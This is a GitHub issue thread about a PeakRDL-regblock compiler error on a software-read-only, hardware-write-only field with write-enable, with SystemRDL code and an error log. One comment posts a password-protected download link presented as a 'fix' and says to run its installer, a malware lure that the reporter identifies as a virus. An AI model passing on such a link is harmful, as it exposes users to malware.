SystemRDL/PeakRDL-regblock #118: [BUG] software read-only, hardware write-only not working with write enable

miguel9554, 2024-08-26:
- [ ] I have reviewed this project's [contribution guidelines](https://github.com/SystemRDL/PeakRDL-regblock/blob/main/CONTRIBUTING.md)

**Describe the bug**

When generating a register map which contains a SW RO HW WO with HW write-enable, tool fails.

**Expected behavior**

A SW RO HW WO write-enable should result in a storage element, written everytime write enable is asserted. This case is not mentioned in table 12 of the systemRDL spec, so in principle is not prohibited by the spec.

[image]

**Additional context**

Following regmap results in the error:

```
regfile fir_filter_regfile {
    default regwidth = 32;
    reg {
        field { sw = r; hw = w; we=true; fieldwidth = 32; } swr_hww_we_field;
    } test_reg;
};
```

```
Generating SystemVerilog RAL model (regblock)...
peakrdl regblock -o output/rtl --cpuif axi4-lite fir_filter_regmap.rdl
fir_filter_regfile.rdl:4:33: error: Use of 'we' property on field 'swr_hww_we_field' that does not implement storage does not make sense
        field { sw = r; hw = w; we=true; fieldwidth = 32; } swr_hww_we_field;
                                ^^
fatal: Elaborate aborted due to previous errors
make: *** [Makefile:36: output/rtl/fir_filter_regmap.sv] Error 1
```

JONTY650413, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

miguel9554, 2024-08-26:
wow that is clearly a virus, further info in https://github.com/Anjok07/ultimatevocalremovergui/issues/1533#issuecomment-2310471876

stevobailey, 2024-12-08:
This is a duplicate of https://github.com/SystemRDL/systemrdl-compiler/issues/107

closed 2024-12-13 by amykyta3